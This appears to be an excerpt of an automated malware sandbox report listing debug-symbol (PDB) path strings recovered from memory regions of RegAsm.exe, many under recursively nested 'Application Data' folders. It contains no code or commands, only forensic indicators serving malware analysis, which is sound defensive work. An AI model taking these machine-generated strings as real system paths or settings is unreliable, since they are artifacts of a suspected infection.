        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qnC:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qjC:\Documents and Settings\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qiC:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: t:\naveen\pgms\cpp\openfilefinder_src_vc8\listfiledrv\objfre_wxp_x86\i386\ListOpenedFileDrv.pdb source: RegAsm.exe, 0000000F.00000002.3703692097.0000000000702000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q~C:\Documents and Settings\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qHC:\Documents and Settings\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q\C:\Documents and Settings\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q~C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: t:\Naveen\mysvn\OpenFileFinder_src_vc8\OpenFileFinder\bin\win32\release\OpenFileFinder.pdb source: RegAsm.exe, 0000000F.00000002.3703692097.0000000000702000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q~C:\Documents and Settings\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qYC:\Documents and Settings\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qjC:\Documents and Settings\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q{C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q]C:\Documents and Settings\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
